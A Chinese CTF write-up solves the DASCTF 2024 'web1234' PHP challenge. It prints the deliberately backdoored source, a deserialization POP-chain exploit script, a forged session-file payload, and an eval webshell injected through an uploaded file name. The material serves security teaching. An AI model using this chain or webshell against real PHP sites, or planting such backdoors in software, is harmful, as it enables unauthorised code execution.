dasctf2024 week1复现

复现题目.

web1234

开局源码泄露www.zip
index.php

<?php
error_reporting(0);
include "class.php";

$Config = unserialize(file_get_contents("/tmp/Config"));

foreach($_POST as $key=>$value){
    if(!is_array($value)){
        $param[$key] = addslashes($value);
    }
}

if($_GET['uname'] === $Config->uname && md5(md5($_GET['passwd'])) === $Config->passwd){
    $Admin = new Admin($Config);
    if($_POST['m'] === 'edit'){
        
        $avatar['fname'] = $_FILES['avatar']['name'];
        $avatar['fdata'] = file_get_contents($_FILES['avatar']['tmp_name']);
        $nickname = $param['nickname'];
        $sex = $param['sex'];
        $mail = $param['mail'];
        $telnum = $param['telnum'];

        $Admin->editconf($avatar, $nickname, $sex, $mail, $telnum);
    }elseif($_POST['m'] === 'reset') {
        $Admin->resetconf();
    }
}else{
    die("pls login! :)");
}

class.php

<?php

class Admin{

    public $Config;

    public function __construct($Config){
        //安全获取基本信息，返回修改配置的表单
        $Config->nickname = (is_string($Config->nickname) ? $Config->nickname : "");
        $Config->sex = (is_string($Config->sex) ? $Config->sex : "");
        $Config->mail = (is_string($Config->mail) ? $Config->mail : "");
        $Config->telnum = (is_string($Config->telnum) ? $Config->telnum : "");
        $this->Config = $Config;

        echo '    <form method="POST" enctype="multipart/form-data">
        <input type="file" name="avatar" >
        <input type="text" name="nickname" placeholder="nickname"/>
        <input type="text" name="sex" placeholder="sex"/>
        <input type="text" name="mail" placeholder="mail"/>
        <input type="text" name="telnum" placeholder="telnum"/>
        <input type="submit" name="m" value="edit"/>
    </form>';
    }

    public function editconf($avatar, $nickname, $sex, $mail, $telnum){
        //编辑表单内容
        $Config = $this->Config;

        $Config->avatar = $this->upload($avatar);
        $Config->nickname = $nickname;
        $Config->sex = (preg_match("/男|女/", $sex, $matches) ? $matches[0] : "武装直升机");
        $Config->mail = (preg_match('/.*@.*\..*/', $mail) ? $mail : "");
        $Config->telnum = substr($telnum, 0, 11);
        $this->Config = $Config;

        file_put_contents("/tmp/Config", serialize($Config));

        if(filesize("record.php") > 0){
            [new Log($Config),"log"]();
        }
    }

    public function resetconf(){
        //返回出厂设置
        file_put_contents("/tmp/Config", base64_decode('Tzo2OiJDb25maWciOjc6e3M6NToidW5hbWUiO3M6NToiYWRtaW4iO3M6NjoicGFzc3dkIjtzOjMyOiI1MGI5NzQ4Mjg5OTEwNDM2YmZkZDM0YmRhN2IxYzlkOSI7czo2OiJhdmF0YXIiO3M6MTA6Ii90bXAvMS5wbmciO3M6ODoibmlja25hbWUiO3M6MTU6IuWwj+eGiui9r+ezlk92TyI7czozOiJzZXgiO3M6Mzoi5aWzIjtzOjQ6Im1haWwiO3M6MTU6ImFkbWluQGFkbWluLmNvbSI7czo2OiJ0ZWxudW0iO3M6MTE6IjEyMzQ1Njc4OTAxIjt9'));
    }

    public function upload($avatar){
        $path = "/tmp/".preg_replace("/\.\./", "", $avatar['fname']);
        file_put_contents($path,$avatar['fdata']);
        return $path;
    }

    public function __wakeup(){
        $this->Config = ":(";
    }

    public function __destruct(){
        echo $this->Config->showconf();
    }
}



class Config{

    public $uname;
    public $passwd;
    public $avatar;
    public $nickname;
    public $sex;
    public $mail;
    public $telnum;

    public function __sleep(){
        echo "<script>alert('edit conf success\\n";
        echo preg_replace('/<br>/','\n',$this->showconf());
        echo "')</script>";
        return array("uname","passwd","avatar","nickname","sex","mail","telnum");
    }

    public function showconf(){
        $show = "<img src=\"data:image/png;base64,".base64_encode(file_get_contents($this->avatar))."\"/><br>";
        $show .= "nickname: $this->nickname<br>";
        $show .= "sex: $this->sex<br>";
        $show .= "mail: $this->mail<br>";
        $show .= "telnum: $this->telnum<br>";
        return $show;
    }

    public function __wakeup(){
        if(is_string($_GET['backdoor'])){
            $func = $_GET['backdoor'];
            $func();//:)
        }
    }

}

class Log{
    public $data;
    public function __construct($Config){
        $this->data = PHP_EOL.'$_'.time().' = \''."Edit: avatar->$Config->avatar, nickname->$Config->nickname, sex->$Config->sex, mail->$Config->mail, telnum->$Config->telnum".'\';'.PHP_EOL;
    }

    public function __toString(){
        if($this->data === "log_start()"){
            file_put_contents("record.php","<?php\nerror_reporting(0);\n");
        }
        return ":O";
    }

    public function log(){
        file_put_contents('record.php', $this->data, FILE_APPEND);
    }
}

还有一个record.php,里面没有内容.
我们对这个源码的正常功能进行分析和解释:
首先会将/tmp/Config文件内容进行反序列化得到一个Config对象.而这个对象包含着用户的个人信息.然后我们需要输入正确的账号和密码(账号直接存储,密码两次md5后存储),如果我们能够正确的输入账号和密码,则会生成一个Admin对象,然后暴露接口,允许我们上传不经任何检验的文件作为用户头像,并对个人信息进行修改,同时将我们的修改的内容进行base64编码alert出来.最后将我们修改的结果记录到record.php文件中.
可以看到,网站的运行整体是没问题的,但是由于出现了多处的错误配置,导致了问题.
我们先来看一下攻击的目标
我们能够访问的只有index.php,class.php,record.php这三个文件,那么问题就出现在了这三个文件中.由于index.php和class.php是不可控的,而record.php则会由我们人为的进行写入,因此我们最后攻击的要点一定是record.php

public function __toString(){
        if($this->data === "log_start()"){
            file_put_contents("record.php","<?php\nerror_reporting(0);\n");
        }
        return ":O";
    }

而我们可以看到在__tostring()这个方法中,如果成功进入if的条件语句,那么久可以向record.php中写入"<?php\nerror_reporting(0);\n"从而提供php标签,将后面的内容当做可以执行的php代码.那么我们的核心要点是如何触发这个__tostring()函数.
在Admin类下存在一个resetconf的方法,注释为恢复出厂设置,其中有base64串.解码.

O:6:"Config":7:{s:5:"uname";s:5:"admin";s:6:"passwd";s:32:"50b9748289910436bfdd34bda7b1c9d9";s:6:"avatar";s:10:"/tmp/1.png";s:8:"nickname";s:15:"小熊软糖OvO";s:3:"sex";s:3:"女";s:4:"mail";s:15:"[email protected]";s:6:"telnum";s:11:"12345678901";}

因此我们可以合理的进行猜测,这个字符串就是当前存储在/tmp/Config下的字符串.我们使用cmd5对密码进行破解,得到了当前的密码.

我们使用uname和passwd进行登录,成功暴露了接口

接下来我们来分析一下如何构造pop链来触发__tostring()魔术方法.不难看出:

Config.__sleep()->Config.showconf()->Log.__tostring()

写成exp如下

<?php
class Config
{
        public $uname;
        public $passwd;
        public $avatar;
        public $nickname;
        public $sex;
        public $mail;
        public $telnum;
        public function __construct(){
                $B=new Log();
                $this->avatar=$B;
        }
}
class Log{
        public $data;
        public function __construct(){
                $this->data="log_start()";
        }
}
$A=new Config();
echo serialize($A);

接下来介绍php session的知识点,也是本题的攻击的核心要点.
session是一种应用在web应用程序中,用来保持会话的有状态性的,存储在服务端的数据结构.session使用cookie技术,每个session都有一个独特的id,通常在http首部字段的cookie中以PHPSESSID的形式存在.
session以$_session[]的形式存储在服务器端的内存中,而当浏览器被关闭或是由于其他原因导致当前会话终止时,session会被序列化并存储在服务端本地(通常在/tmp目录下),格式通常为variable_name|serialized_value,半小时左右以后会被自动删除.如果说之前的PHPSESSID=lbz,那么生成的文件名将为sess_lbz.
当用户再次开启会话时(可能是自动的,也可能是其他原因触发了session_start()函数),服务端会首先在存储session的文件夹下去寻找有没有对应的序列化文件,如果有的话,会将其反序列化,并读取作为全局变量;否则会创建一个新的会话,并将 PHPSESSID cookie 的值设置为新会话的 ID.
那么我们回来看这道题
我们创建一个文件名为sess_lbz的文件,并向文件中写入

aaa|O:6:"Config":7:{s:5:"uname";N;s:6:"passwd";N;s:6:"avatar";O:3:"Log":1:{s:4:"data";s:11:"log_start()";}s:8:"nickname";N;s:3:"sex";N;s:4:"mail";N;s:6:"telnum";N;}

然后上传这个文件.
接下来添加url参数backdoor=session_start来触发如下的后门函数

public function __wakeup(){
        if(is_string($_GET['backdoor'])){
            $func = $_GET['backdoor'];
            $func();//:)
        }
    }

同时在cookie中添加PHPSESSID=lbz来开启一个新的会话,从而将sess_lbz文件中的内容反序列化为$_SESSION[].

然后我们接下来再一次访问,同时通过backdoor来创建新的对话,此时上一个对话的信息回被序列化,并存储到sess_lbz中,而在序列化的过程中,会触发Class类的__sleep()函数,从而完成整条pop的链的执行,向record.php中写入php标签.
注意:此次不要携带PHPSESSID(至少不要携带lbz),否则会向record.php中重复写入php标签

此时我们的record.php已经可以被当做php文件正确的解析了,接下来分析如何传马.

foreach($_POST as $key=>$value){
    if(!is_array($value)){
        $param[$key] = addslashes($value);
    }
}

我们注意到,对于我们传入的post参数,服务端会进行addslashes进行转义防御,但是由于配置错误,只转义防御了值,没防御键,而在Log类的log方法中,恰恰将文件名写入了record.php

public function log(){
        file_put_contents('record.php', $this->data, FILE_APPEND);
    }

因此我们只需要上传一个文件名为1';eval($_POST[1]);#的文件,并访问record.php即可

记录一个以前没注意的问题,就是burp的post模块并不会自动对字符进行url编码,这点是不同于hackbar的.